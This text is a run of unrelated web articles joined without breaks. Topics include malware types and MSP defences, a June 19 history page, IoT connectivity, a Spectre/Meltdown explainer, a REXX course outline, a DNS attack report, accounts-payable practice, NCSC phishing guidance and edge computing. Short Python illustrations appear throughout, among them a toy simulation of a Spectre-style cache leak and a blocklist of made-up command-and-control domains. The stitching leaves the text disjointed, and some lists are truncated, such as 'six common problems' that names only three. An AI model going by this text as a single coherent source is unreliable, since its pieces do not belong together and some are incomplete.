Malware is a broad term that covers many different types of malicious software that can be installed on devices. When threat actors try to get malware installed on an endpoint—such as a laptop, desktop computer, or mobile phone—they’re doing it with the intention to harm, extort, or scare the organization. Malware is on the rise. In Q2 2020, the McAfee Labs Threats Report found a 12% increase in the number of threats per minute (419, to be precise) compared to Q1. And malware was used as the means of attack in 35% of cases that were shared publicly. Oftentimes, malware makes it around IT defenses via user error or out-of-policy behaviors, such as:
- Responding to a phishing email
- Downloading files from untrusted contacts
- Clicking on malicious links
Once a piece of malware is installed, it starts its work. Depending on the type of software, it may exfiltrate valuable data, lock down the computer for ransom (see ransomware), scare the user into doing something, or quietly spy on the machine for monetary or other purposes.
Common types of malware
Some of the most common types of malware that managed service providers (MSPs) will encounter are targeted at endpoints such as laptops, desktop computers, and mobile devices.
Ransomware is a form of malicious software that, once installed on an endpoint, locks down the system until the user pays a ransom to have it released. When threat actors use ransomware, they sometimes encrypt the files, so the content of the computer becomes unreadable. Beyond encrypting the data, it is also becoming more common for bad actors to exfiltrate data—stealing it from corporate systems—in order to increase the chances that targets will pay the ransom. Ransomware is a growing problem; per the 2020 Sophos State of Ransomware report, 51% of companies said they’d experienced a ransomware attack in the last year. The definition of spyware can be broad. Some spyware is actually installed by legitimate software vendors, for example, with the intent of monitoring user activity for more benign purposes like serving ads. For the purposes of the ConnectWise Cybersecurity Glossary, we’re defining it purely in its malicious sense: software installed to spy on an organization or user with harmful intent. With spyware, hackers can monitor the activities of a user without being noticed and steal sensitive information, such as corporate or personal details. If the name “trojan” conjures visions of the ancient city of Troy and a wooden horse, then you’ve understood the origins of the term. Trojans are pieces of software that masquerade as something harmless or even helpful. But, in reality, the software is performing harmful behaviors, such as stealing data. These pieces of malware are localized, meaning that they don’t spread from computer to computer (like a virus does). Today, many trojans take the form of crypto ransomware—once they’ve sneaked into a system under the guise of something else, they encrypt or exfiltrate data and demand a ransom. Last but not least, viruses are one of the most well-known pieces of malware. Most MSP clients will probably have heard of computer viruses and antivirus software. 
Viruses make their way onto computers through infected files, and then—like their biological counterparts—the viruses replicate and spread. When this happens, entire networks can fall victim.

These are just a few examples of malware. There are many, many more forms of malware out there. However, in all cases, the intent is the same: to damage the target and/or extract some monetary gain.

The MSP role in defending against malware

As a trusted IT partner, MSPs are often the frontline defense against malware for small to midsize businesses (SMBs) and other organizations. MSPs provide the technology and knowledge necessary to keep IT systems updated, and they do the actual work of ensuring that organizations are using the right tools—such as firewalls and antivirus—to catch or remove malware. Malware can be installed in many different ways. That's why MSPs are so critical in providing frontline defense. Some of the core ways that MSPs support cybersecurity and lower the risk of malware include the following.

Endpoint management

Hackers target endpoints 24/7. That's why strong endpoint management is an important service. Good endpoint management will include:
- Controls to prevent unknown software applications from installing
- Ongoing scanning for every file to catch any infected items
- Health reports on a device's performance
- And more

By monitoring and managing a client's endpoints closely, MSPs can shore up defenses and limit some of the ways that attackers might try to install malware.

Patch management

From household names like Microsoft 365 to third-party vendors, legitimate software is unfortunately a common vector for malware. Hackers can take advantage of vulnerabilities in older versions to install malware. The best way to prevent this from happening is software patching. With patch management, MSPs ensure their clients are always running the most current versions of software.
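The version comparison at the heart of a patch check can be sketched in a few lines. This is a toy illustration, not any vendor's actual tooling; the package names and version numbers are made up:

```python
def parse_version(v: str) -> tuple:
    """Turn a dotted version string like '10.4.2' into a comparable tuple."""
    return tuple(int(part) for part in v.split("."))

def outdated_packages(installed: dict, latest: dict) -> list:
    """Return packages whose installed version lags the latest known release."""
    return sorted(
        name for name, ver in installed.items()
        if parse_version(ver) < parse_version(latest.get(name, ver))
    )

# Hypothetical software inventory from one client endpoint
installed = {"office-suite": "16.0.1", "pdf-reader": "21.5.0", "browser": "104.0.2"}
latest = {"office-suite": "16.0.3", "pdf-reader": "21.5.0", "browser": "105.0.0"}

print(outdated_packages(installed, latest))  # ['browser', 'office-suite']
```

Comparing versions as integer tuples (rather than as strings) is what keeps "10.4.2" correctly newer than "9.9.9".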
And with automation, MSPs can automatically update machines—removing the risk of human error and saving technicians time.

Remote monitoring

Even before the rise in remote work due to coronavirus, MSPs were servicing clients at a distance with remote monitoring technology. Tools like remote monitoring and management (RMM) software enable MSPs to keep a close eye on all their clients' many endpoints, often from a bird's-eye dashboard. By monitoring systems remotely, MSPs don't have to wait until a user brings a machine to them for a tuneup—they can catch any suspicious device or network activity from afar, and then send in help.

Security Operations Center (SOC)

As noted, security is a 24/7 job. MSPs can offer clients additional security with an expertly staffed security operations center (SOC). Working day and night, the SOC ensures that cybersecurity threats are dealt with quickly and fully. This is crucial, since all it takes is a moment's weakness for a hacker to slip through. A SOC can also help prevent issues before they can take root by generating ongoing research, hunting for threats, applying best practices and removing vulnerabilities before they can be exploited. Of course, creating and properly staffing a SOC can be expensive (as much as $2.3M, according to our calculations!), which is why many MSPs may choose to partner or outsource this function. Regardless, when paired with an RMM solution and ongoing MSP support, a SOC is a powerful defense against cybersecurity threats.
Today In History: June 19

June 19 is the 170th day of the year (171st in leap years) in the Gregorian calendar; 195 days remain until the end of the year. Juneteenth (a portmanteau of "June" and "nineteenth"), also known as Freedom Day, Jubilee Day, and Liberation Day, is an unofficial American holiday celebrated annually on June 19th in the United States. June 19 has its importance in world history. As Karl Marx truly said, "Revolutions are the locomotives of history." Let's take a look at what June 19 holds in history.

June 19, 1865: There's more than one Independence Day in the United States. In Galveston, Texas, upon the arrival of Union troops, Major General Gordon Granger read General Order No. 3: "The people of Texas were informed that, by a proclamation from the Executive of the United States [President Lincoln], all slaves are free. This involves an absolute equality of personal rights and property rights between former masters and slaves." As a result, an estimated 250,000 enslaved African Americans in Texas were finally freed. The day is now celebrated as Juneteenth to commemorate Emancipation and to recognize the struggle for freedom and equality of African Americans.

June 19, 1953: Julius and Ethel Rosenberg were executed by electrocution at Sing Sing Prison in New York. They had been found guilty of providing vital information on the atomic bomb to the Soviet Union during 1944-45. They were the first U.S. civilians to be sentenced to death for espionage, and they were also the only married couple ever executed together in the U.S.

Numerous other events occurred on June 19, and it is hard to believe how many took place on this day alone. From political developments to gory wars, the history books have a lot to tell about this fateful day.
Among the more notable achievements: on June 19, 1952, the United States Army Special Forces, the elite unit of fighters known as the Green Berets, was established at Fort Bragg, North Carolina, and the celebrity-panel game show "I've Got a Secret" debuted on CBS-TV. On the darker side, in 1944, during World War II, the two-day Battle of the Philippine Sea began on this day, resulting in a decisive victory for the Americans over the Japanese. Some of the most devastating and deadly natural calamities, as well as man-made catastrophes, also occurred on this date.
Technological advances are creating a new wave of connected products that previously operated in isolation. This enables companies to control large numbers of products remotely, improving operational efficiency in the field. It allows them to constantly gather streaming information from sensors, creating opportunities for new services and reducing the cost of existing ones.

The Key Role of IoT Connectivity

Connectivity enables the best possible communication by creating a bridge between the physical and the digital world. It links physical devices, such as sensors and controllers, with the applications in the cloud that interact with them. A connectivity solution enables applications to interact with devices to monitor, control and manage them, as well as their subscriptions. An IoT-based service depends on the reliability and quality of the connectivity link. This makes connectivity an important building block in IoT infrastructure. Not only must it be reliable and offer the appropriate quality of service to serve the underlying devices and applications, but it must also be secure enough to stop sensitive data from falling into the wrong hands.

The Benefits of Cellular Connectivity

There are several different technologies that can be used for IoT connectivity, but many suffer from significant drawbacks. It's important to understand your short- and long-term needs and the strengths and weaknesses of the alternative connectivity technologies.

Wired networking is a non-starter for many IoT connections, for example. Economic considerations preclude hardwired connections to local area installations at short distances. These links make it time consuming, disruptive and expensive to move or add equipment. At first glance, local area wireless connections would seem to solve this problem. However, they can also suffer from management problems. Traditional Wi-Fi communications channels are subject to interference thanks to heavily overused 2.4 GHz bands.
While 5 GHz is better, many Wi-Fi devices also use this spectrum today, and it is limited by shorter-distance coverage. These constraints make it more difficult to place and move IoT devices reliably. Wi-Fi is also a difficult technology to scale in large volumes, and its limited range makes it difficult to support collections of devices scattered across remote locations. Wi-Fi networks also carry security risks; to learn more, read our white paper "Risky Business: Avoid the Dangers of Wi-Fi with Cellular-Equipped Laptops."

6 Considerations for IoT Connectivity

For companies looking to implement an IoT solution, there are six crucial considerations:

- Coverage

In many IoT deployments, infrastructure will have to span many different geographies, each with different carrier coverage. Managing multiple SIM vendors across a global deployment is challenging. Infrastructure will also have different coverage requirements based on the use case. An urban deployment may require support for dense clusters of devices to serve a tightly packed population, for example, whereas a rural implementation may serve a sparse population spread across a wide area. Design teams also need to consider the extent to which the IoT network must provide indoor coverage. Extending communication inside buildings introduces a range of technical issues, such as frequency considerations and density of device placement. Or your deployment may only require regional coverage, for example just in the US or Europe.

- Data quality

Many IoT deployments support mission-critical business processes or are in sectors that are part of the critical national infrastructure. Their connectivity solutions must preserve data integrity and reliability, delivering data streams consistently so that networked IoT devices can support accurate, timely results for applications running mission-critical processes.
However, companies can face frequent connectivity issues, with local gaps in coverage or prolonged outages, especially if they rely on a single network provider.

- Scalability

A collection of connected IoT devices will also provide the basis for managing potentially millions of devices spread across a wide area. An IoT connectivity solution must therefore be able to scale. Monitoring the state of IoT devices across the network and controlling their operation relies on a robust connectivity layer.
Barely 48 hours into 2018, what could be one of the biggest cyber security stories of the last ten years is already looking like it could put many of the high-profile security hacks and threats of 2017 in the shade. In this article for Cyber Security Jobs, I want to take a look at the two security vulnerabilities that have come to be known as Spectre and Meltdown: what they are, what's affected and what's being done to mitigate the problem.

In 2017, a new class of critical security vulnerabilities in modern processors was discovered by Google Project Zero (as well as several other individuals from different research institutions). Spectre and Meltdown both work by exploiting the way subsystems in processors work together, manipulating the interactions between certain processes to indirectly reveal information. Reading information through inference like this is known as a "side-channel" attack, in that data is extracted independently, outside of the processor's normal information handling paths. These vulnerabilities are inherent to the architecture of modern processors and the techniques they use, which have evolved over the years in order to improve performance. Such techniques include pipelining, branch prediction and speculative execution. Spectre works specifically by exploiting branch prediction, effectively tricking applications into giving up secure information. Meltdown doesn't work by finding victim code but instead sets up a speculative execution in a user process that is able to access protected memory. For a much more technically in-depth explanation of how Spectre and Meltdown work, this article from Rupert Goodwins at ZDNet explains all.

Let's not beat around the bush; Spectre and Meltdown represent a major security vulnerability that may well have existed for decades.
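To give a feel for how mis-speculation can leak data through a cache side channel, here is a toy software model. It simulates the effect in pure Python; it does not exploit real hardware, and all names and values are invented for illustration:

```python
# Toy software model of a Spectre-style cache side channel. This simulates
# the effect in pure Python -- it does not touch real hardware or caches.
PUBLIC = b"AB"            # data the code is allowed to read
SECRET = b"K"             # adjacent "memory" that should stay private
MEMORY = PUBLIC + SECRET  # flat memory: the secret sits just past the array

cache = set()             # which byte values have left a "cache" footprint

def victim(i: int):
    # Model of speculative execution: the load happens (and warms the
    # cache) before the bounds check decides whether to keep the result.
    value = MEMORY[i]
    cache.add(value)
    if i < len(PUBLIC):
        return value      # in bounds: result is committed
    return None           # out of bounds: result squashed, footprint remains

def attacker(i: int) -> list:
    cache.clear()
    victim(i)             # call the victim with an out-of-bounds index
    # Probe phase: on real hardware this is done by timing memory accesses;
    # here we just check membership in the simulated cache.
    return [b for b in range(256) if b in cache]

print(attacker(2))  # [75] == [ord("K")]: the secret byte, recovered indirectly
```

The key point the model captures is that the victim never returns the secret; the attacker infers it from a side effect (the cache footprint) that the squashed speculation leaves behind.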
Pretty much every laptop, PC, tablet and smartphone processor is affected by Spectre, with Meltdown affecting all Intel chips made since 1995, with the exception of Itanium and the Atom chips made prior to 2013. Cloud services, such as Amazon's Web Services and Google's Cloud Platform, are also vulnerable. The security flaws are a backdoor into critical system memory, which could store anything from passwords to encryption keys, opening you up to major security breaches. The process of extracting this information using Spectre or Meltdown is slow (bytes per second), but very sensitive information is stored at this level and very little of it is potentially needed (a password, for example) in order to compromise a machine or network.

What is perhaps so worrying about these security vulnerabilities, which exist at the heart of so much of our computers' functioning, is that they've been there for decades. Due to their nature it's also very hard to detect whether someone has been the victim of a Spectre or Meltdown attack. In fact, the UK's National Cyber Security Centre has said there is no evidence that either has ever been used to actually steal data. Of course, it's highly likely that this will now change as the information behind these security vulnerabilities is now available to would-be hackers, who will quickly look to create tools to exploit both Spectre and Meltdown vulnerabilities.

The advice for all users, regardless of device manufacturer, is to update all security settings and install any new fixes. As recently as Monday 8th January, Intel CEO Brian Krzanich said that the issues relating to Intel-powered devices were well on their way to being fixed, with 90% of chips released in the last five years expected to be fixed by Saturday (Jan 13th) and fixes for older chips expected in the coming weeks. Microsoft and Linux distributions were amongst the first to release updates, with Chromebooks updated to Chrome OS 63 already protected.
Many Android phones are expected to get updates soon as third-party manufacturers scramble to push them out to their users.

There has been a lot of talk about speed issues resulting from the new patches. Whilst security fixes relating to Spectre are unlikely to have much of an effect on performance, it could be another story when it comes to Meltdown. This is because the fix requires separating the kernel's memory from application memory, so that the bug can no longer read protected kernel data from user space. Estimates range as high as a 30% reduction in speed on certain tasks, with applications that do a lot of file writing the most seriously affected, and things like gaming and web browsing least affected.

A recent development was Microsoft's decision on 9th January to halt Spectre and Meltdown updates to all machines running AMD processors. This has been due to repeated complaints from users unable to boot their computers. The software giant is now preventing all AMD machines from receiving the latest security update until it can resolve the issue in conjunction with AMD. Microsoft is blaming AMD's documentation for the problems.

Perhaps one of the most thought-provoking things to come out of the chaos and confusion surrounding Spectre and Meltdown, from a cybersecurity industry point of view, has been how four independent groups of security researchers managed to find, within months of each other, flaws that had lain dormant in these processors for over 20 years. When Daniel Gruss of Graz University of Technology in Austria and his two colleagues discovered Meltdown and reported it to Intel, they were surprised to hear that Intel was already working on a fix and that they were in fact the fourth group to report this class of vulnerability, along with what would come to be known as Spectre.
This also raises the question of how many people may have found this vulnerability already and, if so, why it wasn't made public. It's no conspiracy theory to posit that security agencies like GCHQ and the NSA, after discovering security vulnerabilities, will likely keep them secret in order to exploit them for the purposes of espionage. Of course, this raises the possibility of other actors discovering them independently, in what's known in the industry as "bug collision." The question that arises from the potential bug collision of Spectre and Meltdown is this: if discovery of the same bugs and security flaws by independent groups is fairly commonplace (whether coincidence or not), then are security agencies like the NSA or GCHQ not obliged to report the flaws sooner rather than later, in order to get them fixed and reduce the risk that other security agencies or malevolent actors will discover and exploit them? This is a complex question with national security, political and ethical ramifications, but you can find more detail in this excellent Wired article about it.
REXX Keyword Instructions

The REXX Keyword Instructions course discusses the common keyword instructions used in REXX coding and describes how looping and execution control instructions are invoked.

Audience

Personnel requiring an introduction to REXX and an understanding of the fundamentals of programming in REXX.

Prerequisites

Basic understanding of data processing concepts, some basic programming skills and completion of the Introduction to REXX course or equivalent knowledge.

Objectives

After completing this course the student should be able to:
- Identify and use Conversational and Variable Management Keyword Instructions
- Identify and use Conditional Flow Keyword Instructions
- Identify and use looping structures
- Identify and use Execution Control, Branching and Debugging Keyword Instructions

Course Content

REXX Conversational and Variable Management Instructions
- Using Conversational Keyword Instructions
- Using the External Data Queue
- Variable Templates and Parsing

Logic Flow - Conditional Processing
- Using the IF/THEN/ELSE Keyword Construct
- Using the SELECT/WHEN/OTHERWISE/END Keyword Construct

Logic Flow - Looping
- Using Repetitive Loops
- Using Controlled Repetitive Loops
- Using Conditional and Compound Loops
- Controlling Nested Loops

Execution Control Instructions
- Using Execution Control Instructions
- Branching, Procedures and Subroutines

REXX Keyword Instructions Mastery Test

This course is part of the IBM Digital Badge Program: REXX Programming - Experienced

Contact our Learning Consultants or call us at 770-872-4278
Ever since the pandemic hit, the global threat landscape has grown more vulnerable, with a wider impact on the cybersecurity community. And this is just the beginning. According to the 2021 Global DNS Threat Report from network security automation solutions provider EfficientIP, nearly 90% of organizations suffered a Domain Name System (DNS) attack last year. Cybercriminals are leveraging multiple hacking techniques to pilfer sensitive digital assets, and one of them is DNS attacks.

What is a DNS Attack?

DNS is a protocol that translates a domain name into an IP address. In a DNS attack, adversaries exploit vulnerabilities in the domain name system to obtain access to targeted devices. They also pharm and phish users to generate revenue and steal critical data. DNS is leveraged to launch attacks in multiple ways, including DNS reflection attacks, DoS, DDoS, and DNS poisoning.

"This past year of the pandemic has shown us that DNS must play a role in an effective security system. As workers look to more permanently transition to off-premises sites, making use of cloud, IoT, edge, and 5G, companies and telecom providers should look to DNS for a proactive security strategy. This will ensure the prevention of network or application downtime as well as protecting organizations from confidential data theft and financial losses," said Ronan David, VP of Strategy for EfficientIP.

Key findings from the report:
- Malaysia experienced the highest increase in cost per attack, up 78%, with an average cost per attack of $787,200. The other two countries among the top three were India and Spain.
- In Asia, while India experienced an increase of 32%, Singapore's damages declined by 12%, against the regional average increase of 15%.
- Asia experienced a sharp rise in average damages to $908,140, compared to last year's $792,840. The countries that saw average damages above $1,000,000 were India, France, and Germany.
- 26% of organizations reported sensitive customer information being stolen, compared to 16% in 2020.
- Phishing also continued to grow, with 49% of companies experiencing phishing attempts. In the Asia Pacific region the phishing rate was as high as 46%, with nearly half of organizations in India, Singapore, and Malaysia experiencing a phishing attack. Other commonly experienced attack types included malware-based attacks, domain hijacking, cloud misconfiguration abuse, DNS tunneling, and zero-day vulnerability exploitation.

The Impact of DNS Attacks

The report revealed that downtime of in-house and cloud applications remains the major impact of DNS attacks, indicating how critical DNS is to ensuring resilience and securing access between users and applications.

"The impact and cost of attacks remain extremely high and continue to increase year over year. This not only affects company finances but also brand image and data confidentiality. With the pandemic, ransomware has increased to become an industry in its own right and a major concern for most organizations. Using DNS filtering and blocking is critical as it can help to stop ransomware attacks right after the infection, when the malware tries to contact command and control," the report stated.
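The DNS filtering the report recommends boils down to checking each queried name against threat intelligence before resolving it. A minimal sketch, with a made-up blocklist; real deployments use commercial feeds and handle wildcards, punycode, and much more:

```python
# Hypothetical threat-intelligence feed of known command-and-control domains
BLOCKLIST = {"c2.badguys.example", "ransom-payload.example"}

def effective_domains(name: str):
    """Yield the queried name and each parent domain down to (but not
    including) the TLD, e.g. a.b.example -> a.b.example, b.example."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        yield ".".join(labels[i:])

def should_block(name: str) -> bool:
    """Block the query if the name or any parent domain is on the blocklist."""
    return any(d in BLOCKLIST for d in effective_domains(name))

print(should_block("update.c2.badguys.example"))  # True: parent domain is listed
print(should_block("www.example.org"))            # False
```

Checking parent domains matters because malware often uses randomized subdomains of a fixed command-and-control domain.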
Accounts Payable is a crucial business function that corporate decision makers can leverage to control working capital, manage supplier relationships and reduce costs. Here's a breakdown of the Accounts Payable process, important metrics and methods for achieving execution excellence through continuous process improvement.

Accounts Payable (AP or A/P), sometimes called "payables," is a key part of how businesses control their cash flow. In general accounting terms, AP is a current, short-term liability/debt for goods or services received on credit from a vendor. Within a company's financial statements, Accounts Payable appears as a current liability on the balance sheet.

An organization's Accounts Payable team, often located within the Finance department, is responsible for processing and paying supplier invoices. They also play a key role in maintaining vendor relationships, as they are often the point of contact for invoicing and payment-related issues, such as payment status.

An AP expense can be anything from office supplies to restaurant ingredients and includes, but is not limited to:
- Energy and fuel
- Transportation and logistics

Accounts Payable has historically been thought of as a cost center, but in reality it's a strategic tool for managing working capital. In periods of high inflation, supply chain disruptions and global macroeconomic instability, AP procedures can be adjusted to preserve cash by paying invoices later (extending payment terms) or improve profitability by paying invoices early to receive cash discounts. Businesses can maximize their AP execution capacity by dynamically adjusting invoice processing.

Accounts Payable sits within the Procure-to-Pay (P2P), sometimes called Purchase-to-Pay, business process after Procurement, also called Purchasing. More broadly, P2P is the second stage of the Source-to-Pay (S2P) process after Sourcing.
The AP process itself contains the following steps, in order:
- Purchase and receive goods
- Record invoice receipt
- Due date passed

"Purchase and Receive Goods" is often handled by the Procurement team, with the AP team completing the remaining steps.

Accounts Receivable (AR or A/R), sometimes called "receivables," is the current money owed to your company for products and services that have been rendered but not paid for (on credit). Accounts receivable is considered a current asset on a corporate balance sheet, whereas accounts payable is considered a current liability. Like AP, the AR team is often located within the Finance department.

AP teams have the ability to accelerate cash preservation, boost productivity and cut costs through the following business objectives: Labor Productivity, Working Capital Optimization, Cost Avoidance and Compliance.

Accounts Payable exists to ensure that suppliers are paid on time for the goods and services required by the business, as efficiently as possible. Using tools like AP automation, teams can influence Labor Productivity by improving cycle time and reducing costs. They can help the business better manage working capital by increasing DPO, paying on time and creating a negative cash conversion cycle (i.e. inventory is sold before the business has to pay for it). They can drive Cost Avoidance by capturing cash discounts, preventing duplicate payments and avoiding penalties. And AP teams can ensure Compliance by verifying on-time payment with the correct amount.

There are multiple metrics, or key performance indicators (KPIs), businesses track to determine whether Accounts Payable is meeting core business objectives.
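Cash discounts of the kind mentioned above are usually quoted as terms such as "2/10 net 30": 2% off if paid within 10 days, full amount due in 30. A small sketch of the payoff, with invented invoice figures:

```python
def discounted_amount(invoice_total: float, discount_pct: float,
                      discount_days: int, days_to_payment: int) -> float:
    """Amount actually owed under early-payment terms like 2/10 net 30."""
    if days_to_payment <= discount_days:
        # Paid inside the discount window: apply the percentage reduction
        return round(invoice_total * (1 - discount_pct / 100), 2)
    # Discount window missed: the full invoice amount is due
    return invoice_total

# Hypothetical $50,000 invoice on 2/10 net 30 terms
print(discounted_amount(50_000, 2, 10, 8))   # 49000.0: paid day 8, discount captured
print(discounted_amount(50_000, 2, 10, 25))  # 50000: paid day 25, discount missed
```

Even a 2% discount is significant at scale, which is why lengthy invoice processing (and the payment blocks discussed later) directly hurts operating margins.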
Here are six common AP metrics, each falling under one of the four business objectives listed above:
- Cost per Invoice - Labor Productivity
- No-Touch Rate - Labor Productivity
- Days Payable Outstanding (DPO) - Working Capital Optimization
- Excess Spend - Cost Avoidance
- Late Payment - Cost Avoidance
- Pre-Approved Spend - Compliance

The Accounts Payable department can improve their KPI performance and ensure process excellence by using automation, Process Mining and Execution Management to reduce vendor invoice errors, eliminate duplicate payments, capture cash discounts, avoid penalty and late payments, stop maverick buying and maintain approval compliance.

Days Payable Outstanding (DPO)

Days Payable Outstanding is the average number of days a company takes to pay its bills. A higher DPO means a company takes longer to pay its debts; a lower DPO means a company pays its bills more quickly. AP departments can use DPO to manage free cash flow and working capital. By extending DPO, companies can hold on to cash longer or use it for short-term investments. However, a high DPO could also be an indication that an organization is having difficulty paying its bills. And by reducing DPO, companies may be able to take advantage of supplier cash discounts.

What is an average DPO? It depends on the industry, but according to the J.P. Morgan Working Capital Index Report 2022, the average DPO for 2021 was 47.4 days. From 2011 to 2021, the average DPO fluctuated between 45.8 in 2012 and 51.1 in 2020, during the Covid-19 pandemic.

Prevent duplicate invoice payments. Companies lose significant amounts of cash from paying duplicate invoices. Unfortunately, many ERP systems only detect duplicates that are 100% matches, and don't detect small differences such as typos, scanning errors or inaccurate master data. Duplicate invoices can also happen when the same invoice is submitted both on paper and electronically.
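Near-duplicate detection of the kind described above can be sketched with simple normalization plus fuzzy string matching. The invoice records and the 0.8 similarity threshold below are invented for illustration; production systems use far richer features (vendor master data, dates, ML models):

```python
from difflib import SequenceMatcher

def normalize(ref: str) -> str:
    """Strip punctuation/whitespace and case so 'INV-1001 ' matches 'inv1001'."""
    return "".join(ch for ch in ref.lower() if ch.isalnum())

def likely_duplicates(a: dict, b: dict, threshold: float = 0.8) -> bool:
    """Flag two invoices as probable duplicates: same vendor and amount, and
    reference numbers that are identical or nearly so (typos, OCR errors)."""
    if a["vendor"] != b["vendor"] or a["amount"] != b["amount"]:
        return False
    ra, rb = normalize(a["ref"]), normalize(b["ref"])
    return SequenceMatcher(None, ra, rb).ratio() >= threshold

paper = {"vendor": "ACME GmbH", "amount": 1250.00, "ref": "INV-2022-10071"}
scan  = {"vendor": "ACME GmbH", "amount": 1250.00, "ref": "INV-2022-1OO71"}  # OCR: 0 -> O

print(likely_duplicates(paper, scan))  # True
```

An exact-match check, which is all many ERP systems do, would miss this pair entirely because of the two mis-read characters.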
With process mining, execution management and machine learning, AP departments can better detect duplicate payments, reclaim the associated payments and proactively prevent future duplicate payments.

Minimize Payment Term Mismatches. Too often, AP teams can't tell whether an invoice's payment terms match those within the vendor's contract, which could be more favorable to your business. Companies operating at peak execution capacity are able to scan each incoming invoice and detect discrepancies in the payment terms between the invoice, purchase order (PO), vendor master data and historical invoices from that vendor.

Maximize Cash Discount Utilization. Payment blocks and lengthy invoice processing times often mean companies don't capture all of the cash discounts available to them, which hurts operating margins. The Accounts Payable office can leverage automation and process mining to determine which vendors would be the best candidates for cash discounting, pinpoint when and where leakages are happening and prioritize the removal of vendor payment blocks to capture discounts.

Minimize Payment Blocks. Payment blocks happen when there is a price or quantity mismatch between the PO and invoice, or missing goods cause a three-way match error. If blocks prevent AP from making a timely payment and result in excessive late payments, suppliers may prioritize other customers or cancel orders. AP departments can use an execution management system to identify the root causes of mismatches and missing goods receipts, allow purchasers to update PO prices and confirm goods receipts, and even automate block removal.

Prevent Currency Mismatches. As companies grow their international business, they may also experience a rise in foreign currency transactions. To reduce incorrect payments, AP teams must identify the correct currency for a transaction.
Process mining and execution management solutions can be used to detect and flag incoming invoices with unusual currencies (based on historical invoices, the PO and master data) so analysts can take action. Regardless of the industry, company size or AP software used, Accounts Payable departments face many of the same challenges. Here are six common problems that prevent companies from running an efficient AP operation:
- Payment term discrepancies between invoices and POs
- Incorrectly filled-in invoices
- Lengthy approval times
Process Mining and Execution Management give AP departments the means to overcome these challenges without the cost and disruption of replacing existing hardware and software. Accounts Payable automation helps improve AP productivity by streamlining procedures, reducing manual work, reducing rework caused by human errors, and increasing process consistency. AP automation comes in many forms, from simple spreadsheet macros to full-blown robotic process automation (RPA), and it can be used to automate everything from invoice routing and approval to managing purchasing card transactions. Indeed, it would be unrealistic for today's large enterprises to manage the volume of transactions that flow through their AP departments without some form of automation. The question for AP executives is therefore not whether to implement automation, but which AP processes they should automate and how they can realize the maximum benefit from their automation efforts. Process Mining and Execution Management can address both concerns. Process Mining pulls data from your existing business systems, creates an X-ray of your AP process and identifies any execution gaps. Understanding where your biggest inefficiencies are gives you a starting point for your AP automation strategy. Execution Management combines Automation, Process Mining and technologies such as artificial intelligence and machine learning into a single platform, an Execution Management System (EMS).
An EMS ingests data from multiple business systems, analyzes that data and then automatically executes targeted actions through those existing systems. By delivering insights and enabling action, an EMS allows AP organizations to operate at maximum capacity.
The National Cyber Security Centre (NCSC) is a part of GCHQ, working to increase cyber security standards across the UK. Regularly offering advice on its website, the NCSC has recently released its guidance on how to defend your organisation against phishing attacks. Cybercrime has cost the UK an estimated £26 billion, with phishing being the most common type of attack, affecting more than 1 million businesses last year. It is a type of social engineering, where cyber attackers rely on users making mistakes such as clicking a bad link or disclosing information. Whilst phishing can be conducted via many channels, such as text messages and phone calls, most people consider phishing attacks to be orchestrated via email. Phishing is a popular choice among cyber-criminals for many reasons:
- It is an easy method for targeting a lot of people, with many recipients unknowingly forwarding the phishing email to colleagues and friends
- There are many phishing tools available online for little cost, enabling novice hackers to perform phishing attacks
- It can be used alongside ransomware and malware, relying on human errors rather than system vulnerabilities
Typical defences include cyber security training and awareness for employees. However, in its latest guidance, the NCSC has highlighted that whilst awareness is important, there are limitations and drawbacks when training is relied upon as the sole defence mechanism. Instead, the guidance suggests that organisations implement a multi-layered approach to cyber security. The four layers include:
- Making it difficult for attackers to reach users
- Helping users to identify and report suspected phishing emails
- Protecting the organisation from the effects of undetected phishing emails
- Responding quickly to incidents
To view the full guidance document, click here. This follows further guidance for SMEs that was released by the NCSC in October 2017.
This advice includes backing up data, using strong passwords, protecting against malware, keeping devices safe and avoiding phishing attacks. For more information about this wider five-step programme, click here. Eventura work with customers to implement comprehensive cyber security plans, which adopt a multi-layer approach and are tailored to individual business needs. If you are concerned about cyber security and would like to have a friendly chat with our professional team, simply contact us by clicking here.
By the year 2025, over 200 million edge nodes will be deployed worldwide. But what will all this additional spending on edge computing amount to? For distributed enterprises, those with many locations or those with a far reach, edge computing can reduce latency, lower the load on central data centers, and increase security. So how do you implement edge computing, and why should you? What is edge computing? Edge computing is actually a fairly literal name. Companies have centralized data centers where they store large amounts of information, but to get that information to customers and employees far away from the central data center, they need to push some of that computing power to the edge of the network – and expand the concept of enterprise networking to include the needs of all those remote devices. With these edge nodes, customers and employees can get information faster than they could if they needed to access the central data center. The OpenStack diagram below shows how a network that features edge computing might be set up. Edge computing benefits Reduced latency In traditional data center models, whether on premises or cloud-based, when remote applications need data, they send a signal all the way to the main data center and then have to wait for it to come back. While information travels quickly over the internet, even minor delays can add up over the course of a day or week, and the more relays there are, the higher the chance that a request hits a delay. In critical use cases, say autonomous cars or energy sensors, latency and reliability issues can have serious consequences. Edge computing, on the other hand, utilizes local resources to process data, reduce latency and allow applications to perform actions based on predetermined triggers. If a company needs to update a trigger, then it can send updates via the data center.
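The trigger pattern described here — process locally, contact the data center only when the rules change — can be sketched as a toy model. The class and rule names are invented for illustration and don't come from any real edge platform:

```python
# Minimal sketch of an edge node that handles sensor triggers locally
# and only talks to the central data center when its rules are updated.

class EdgeNode:
    def __init__(self, rules):
        self.rules = rules          # trigger -> action mapping, cached locally
        self.round_trips = 0        # count of contacts with the central data center

    def handle(self, trigger):
        # Local processing: no round trip, so no network latency per event.
        return self.rules.get(trigger, "ignore")

    def sync(self, central_rules):
        # Occasional update from the data center replaces per-event traffic.
        self.round_trips += 1
        self.rules.update(central_rules)

# A door sensor handles 1,000 events with zero data-center round trips...
node = EdgeNode({"badge_scan_ok": "unlock_door"})
actions = [node.handle("badge_scan_ok") for _ in range(1000)]

# ...and needs exactly one round trip to learn a new rule.
node.sync({"fire_alarm": "open_all_doors"})
```

The point of the sketch is the ratio: thousands of locally handled events per single central update, which is what takes the load off the main servers.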
